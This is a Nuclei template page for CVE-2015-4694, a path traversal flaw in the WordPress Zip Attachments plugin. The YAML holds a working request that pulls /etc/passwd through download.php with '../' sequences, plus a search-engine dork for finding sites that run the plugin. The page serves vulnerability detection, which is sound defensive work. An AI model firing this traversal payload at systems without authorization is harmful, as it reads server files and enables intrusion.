Skip to content
Nuclei Templates

WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval

ID: CVE-2015-4694

Severity: high

Author: 0x_Akoko

Tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project

Description

Section titled “Description”

WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.

YAML Source

Section titled “YAML Source”
id: CVE-2015-4694


info:
  name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
  impact: |
    Arbitrary file retrieval
  remediation: |
    Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
  reference:
    - https://wordpress.org/plugins/zip-attachments/#developers
    - https://wpscan.com/vulnerability/8047
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4694
    - http://www.vapid.dhs.org/advisory.php?v=126
    - https://wordpress.org/plugins/zip-attachments/changelog/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2015-4694
    cwe-id: CWE-22
    epss-score: 0.02304
    epss-percentile: 0.89683
    cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: zip_attachments_project
    product: zip_attachments
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/zip-attachments"
  tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project


http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 4a0a004730450220392e43c8d0becda89594d61e116ae56fc6835eff6bd1fcdd9898b5d839527c42022100d8030d6ccf47790abd5d77c1eeb2f5bb68b5b9a425f8174be589b4a66f937699:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-4694.yaml"

View on Github